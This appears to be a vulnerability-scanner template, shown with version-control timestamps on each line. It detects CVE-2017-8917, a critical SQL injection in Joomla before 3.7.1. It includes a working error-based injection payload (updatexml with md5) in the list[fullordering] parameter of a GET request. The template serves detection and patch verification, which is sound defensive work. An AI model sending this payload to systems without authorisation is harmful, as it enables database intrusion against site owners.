2021-04-07 16:39:33 +00:00
id : CVE-2017-8917
2022-04-22 10:38:41 +00:00
2021-04-07 16:39:33 +00:00
info :
2022-05-12 14:04:18 +00:00
name : Joomla! <3.7.1 - SQL Injection
2021-04-07 16:39:33 +00:00
author : princechaddha
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-12 14:04:18 +00:00
description : |
Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors.
2022-04-22 10:38:41 +00:00
reference :
- https://www.cvedetails.com/cve/CVE-2017-8917/
2022-05-17 09:18:12 +00:00
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210421142819/https://www.securityfocus.com/bid/98515
2022-05-17 09:18:12 +00:00
- http://www.securitytracker.com/id/1038522
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-8917
cwe-id : CWE-89
2022-04-22 10:38:41 +00:00
tags : cve,cve2017,joomla,sqli
2021-04-07 16:39:33 +00:00
2022-06-30 03:33:07 +00:00
variables :
num : "999999999"
2021-04-07 16:39:33 +00:00
requests :
- method : GET
path :
2022-06-30 03:33:07 +00:00
- "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"
2021-04-07 16:39:33 +00:00
matchers :
- type : word
2022-05-12 14:04:18 +00:00
part : body
2021-04-07 16:39:33 +00:00
words :
2022-06-30 03:33:07 +00:00
- '{{md5({{num}})}}'
2022-05-12 14:04:18 +00:00
# Enhanced by mp on 2022/05/11